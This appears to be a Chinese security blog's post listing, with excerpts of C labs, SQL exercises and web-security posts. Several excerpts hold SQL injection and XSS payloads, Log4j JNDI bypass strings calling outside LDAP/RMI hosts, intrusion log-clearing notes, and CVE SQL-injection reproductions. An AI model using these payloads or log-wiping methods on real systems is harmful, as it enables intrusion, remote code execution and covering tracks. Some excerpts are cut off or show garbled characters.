- 博客(21)
- 收藏
- 关注
RSS订阅原创 【WEB安全】SQL注入 payload
'"!@#)\(/?;'" OR 1=1 OR 1=0 OR 1=1 -- OR 1=0 -- ' OR '1'='1' OR '1'='0' OR 1=1 -- ' OR 1=0 -- " OR "1"="1" OR "1"="0" OR 1=1 -- " OR 1=0 -- ") OR 1=1 -- ") OR 1=0 -- ') OR 1=1 -- ') OR 1=0 -- AND 1=1 AND 1=0 AND 1=1 -- AND 1=0 --
2021-12-16 10:19:10
3002
2
原创 [WEB安全]XSS payload
<script>alert(1)</script> <script>alert(2)</script>medium--> ˫дÈƹý£º<sc<script>ript>alert(4)</script> ´óСд»ìÏýÈƹý£º<ScRipt>alert(5)</script> <img src=1 onerror=alert(7)>onmouseo
2021-12-16 10:06:38
2382
原创 【WEB安全】Log4j Bypass WAF Payloads
Log4j Bypass WAF Payloads${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${jndi:rmi:
2021-12-14 11:02:18
6012
转载 BurpSuite ——AuthMatrix插件安装与使用
BurpSuite ——AuthMatrix插件安装与使用转载自:https://blog.csdn.net/edisonjh/article/details/106275819BurpSuite AuthMatrix插件安装Burp Suite BApp Store安装AuthMatrix可以通过Burp Suite BApp Store安装。在BurpSuite中,选择Extender选项卡,选择BApp Store,选择AuthMatrix,然后单击install。使用前准备burp可以
2021-02-05 17:21:13
2426
1
转载 Linux系统的LOG日志文件及入侵后日志的清除
Linux系统的LOG日志文件及入侵后日志的清除UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的痕迹,UNIX系统存放LOG文件,普通位置如下: /usr/adm - 早期版本的UNIX/var/adm - 新一点的版本使用这个位置/var/log - 一些版本的Solaris,linux BSD,Free BSD使用这个位置/etc - 多数UNIX版本把utmp放在这里,有些也把wtmp放在这里,syslog.conf在这里下面的一些文件根据你所在的目录不同而不
2020-11-14 11:33:49
955
原创 SQL语句练习题-无答案
• 1、查询“001”课程比“002”课程成绩高的所有学生的学号;• 2、查询平均成绩大于60分的同学的学号和平均成绩;• 3、查询所有同学的学号、姓名、选课数、总成绩;• 4、查询姓“李”的老师的个数;• 5、查询没学过“叶平”老师课的同学的学号、姓名;• 6、查询学过“001”并且也学过编号“002”课程的同学的学号、姓名;• 7、查询学过“叶平”老师所教的所有课的同学的学号、姓名;• 8、查询课程编号“002”的成绩比课程编号“001”课程低的所有同学的学号、姓名;• 9、查询所有课程
2020-11-02 15:24:30
333
原创 LINUX常用命令-系统安全篇
一、常用的shell命令1、ls [目录] --显示文件夹下有哪些内容的命令1• ls -a [目录]• 显示当前目录下的所有文件,包括隐藏文件• ls -l []• 以长格式显示文件的所有(详细)信息,简写为: ll• ls -h []• 显示文件大小的单位,便于阅读h human-readable2、新建文件夹和文件• mkdir 目录1 目录2• mkdir –p /…/A/B/C–在指定文件新建A文件夹 并在A文件夹下新建B 在新建C• mkdir -m
2020-11-02 15:00:41
885
原创 正则表达式简介-Linux常用
1、 [ABC]-匹配 […] 中的所有字符2、 [^ABC]-匹配除了 […] 中字符的所有字符3、 .-匹配除换行符(\n、\r)之外的任何单个字符,相等于 [^\n\r]。4、[\s\S]-匹配所有。\s 是匹配所有空白符,包括换行,\S 非空白符,包括换行5、 \w-匹配字母、数字、下划线。等价于 [A-Za-z0-9]6、 ( )-标记一个子表达式的开始和结束位置7、 *-匹配前面的子表达式零次或多次8、 .-匹配除换行符 \n 之外的任何单字符9、 [-标记一个中括号表达式的开始
2020-11-02 14:26:07
106
原创 应用密码学-RSA
按照模重复平方法,计算 a的m次方modn(1)在主程序中读入数据, 输入顺序为:a n m(ps:a,m,n 都小于 1000)(2) 使用模重复平方法进行计算,得到结果#include <stdio.h>#include <iostream>using namespace std;void LRFun_14(int x_14, int y_14, int z_14);void main(){int a,m,n;printf("请输入数字(a, m, n): \
2020-09-16 11:48:40
220
原创 应用密码学-AES
按照 AES 算法,完成 AES 算法的列混合操作;#include <stdio.h>#include <iostream>#include <stdlib.h> //函数声明unsigned char gfmultby01(unsigned char b);unsigned char gfmultby02(unsigned char b);unsigned char gfmultby03(unsigned char b);void mixcolumns_
2020-09-16 11:45:20
246
原创 CVE-2018-6376复现-Joomla!3.8.4-SQL注入漏洞
1.1漏洞原因1.1.1漏洞描述图9 CVE-2018-6376漏洞被描述为:在Joomla!在3.8.4之前,SQL语句中缺少类型转换导致Hathor postinstall消息中的SQL注入漏洞。为了预防SQL注入攻击,而将输入到应用程序中的某些数据进行了“转义(escape)”,但是这些数据却又在“未被转义(Unescaped)”的查询窗体中重复使用。此时,攻击者可能注入的是一个PAYLOAD,这样就会构成一个SQL查询语句并被执行; 当用户可控数据以不安全的方式合并到数据库SQL查询中时,
2020-09-16 11:40:54
841
原创 SQL注入测试-part01+02
文章目录1、利用floor()函数进行报错注入2、利用extractvalue()函数进行报错注入3、利用updatexml()函数进行报错注入4、基于时间延迟的盲注5、基于时间延迟的盲注,利用benchmark函数1、过滤了特殊符号的字符型注入2、过滤了逗号的字符型注入3、数字型注入,数据库用户名为root,可以执行load_file()函数1、利用floor()函数进行报错注入数据库版本5.5.47-0ubuntu0.14.04.1:http://IP:4606/?id=1 and(select
2020-09-16 11:32:59
211
原创 对CVE-2017-6089的复现-phpcollab 2.5.1的SQL注入
下载phpCollab-v2.5.1,放到web根目录下安装图1 PHP Collab 安装图2登陆账号:admin,密码:adminPHP Collab 登录添加一个项目:4.漏洞复现4.1漏洞原因4.1.1漏洞描述图 CVE-2017-6089漏洞被描述为:在phpcollab 2.5.1以及更早版本中存在SQL注入漏洞,允许远程攻击者执行任意的SQL指令。漏洞存在于3处,topics/deletetopics.php中project参数和id参数,bookmarks/d
2020-09-16 11:20:46
790
原创 C语言-工程实践-万年历
万年历1 引言1.1 国内外现状1.2 本课题研究的迫切性1.3 本文的主要工作2 需求分析2.1 系统目标2.2 系统功能2.3 开发环境及工具2.3.1 运行环境2.3.2 vc++介绍2.3.3 开发语言3 系统总体结构设计3.1 系统结构基本简介3.2 系统功能模块及设计3.2.1 数据结构设计(系统详细模块流程图)3.2.2 功能模块介绍4 系统测试与分析4.1 测试4.2 调试过程中遇到的主要问题5.附源码:1 引言1.1 国内外现状C语言作为一门通
2020-09-16 10:51:20
1357
1
原创 C语言-实验8
掌握指针的概念,会定义和使用指针变量一、192页10.1#include<stdio.h>#include<stdlib.h>void exchange(int*min,int*max);int main(void){ int *p,*q; p=(int*)malloc(sizeof(int)); if(p==NULL) { return 0; } q=(int*)malloc(sizeof(int)); if(q==NULL) { free(
2020-09-16 10:42:55
371
原创 C语言-实验7
结构体类型变量yu共用体一、有5个学生,每个学生的数据包括学号、姓名、3门课的成绩,从键盘输入5个学生数据,要求输出3门课总平均成绩,以及最高分的学生的数据(包括学号、姓名、3门课的成绩、平均分数)。要求:1)用结构体数组存放学生信息;2)定义名为input的函数输入5个学生数据;3)定义名为average的函数求总平均分;4)定义名为max的函数找出最高分学生数据;5)总平均分和最高分的学生的数据都在主函数中输出。#include <stdio.h>struct Student
2020-09-16 10:39:59
1616
原创 C语言-实验6
字符数组和字符串函数一、用一个函数来实现将一行字符串中最长的单词输出。此行字符串从主函数传递给该函数。#include <stdio.h>#include <string.h>int main(){ int judge(char); int longest(char[]); int i; char str[100]; printf("请输入一行字符:\n"); gets(str); printf("最长的单词为:\n"
2020-09-15 00:00:48
680
原创 C语言-实验5
一维数组和二维数组、字符数组和字符串函数、数组有关的算法一、用选择法对10个整数排序。10个整数用scanf函数输入(参考教材112页例8-3)#include <stdio.h>int main(){ int i,j,minp; int temp; int a[10]; printf("输入10个整数(空格分隔):\n"); for(i = 0;i < 10;i++) { scanf("%d",&a[i]); } for(i = 0;i < 9
2020-09-14 23:57:36
423
原创 C语言-实验4
函数实参与形参函数的嵌套调用和递归调用一、写一个判别素数的函数,在主函数输入一个整数,输出是否素数的信息。本程序应当准备以下测试数据:17、34、2、1、0。分别运行并检查结果是否正确。#include <stdio.h>int main(){ int a,b,c; printf("输入一个数字:\n"); scanf("%d",&a); for(b=2;b<a;b++) { if(a%b == 0) { c = 0; } } if(c
2020-09-14 23:54:55
340
原创 C语言-实验三
while 语句,常用算法一、从键盘输入两个正整数m和n,找出它们的最大公约数和最小公倍数。#include<stdio.h> int main() { int x, y, z, m, n; printf("请输入两个数:"); scanf("%d,%d", &x, &y); m = x, n = y; while (y != 0) { z = x%y; x
2020-09-14 23:52:03
685
1
原创 C语言-实验2
逻辑运算与条件语句一、有一函数:y=2*|x|+1,y=2*|x|+2,y=2*|x|+3.?用scanf函数输入x的值,求y值。?运行程序,输入x的值(分别为x<1、1~10、x≥10这3种情况),检查输出的y值是否正确。#include <stdio.h>#include <math.h>int main(void){ int x,y; printf("input x:\n"); scanf("%d",&x); if(x < 1)
2020-09-14 23:47:43
1035
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人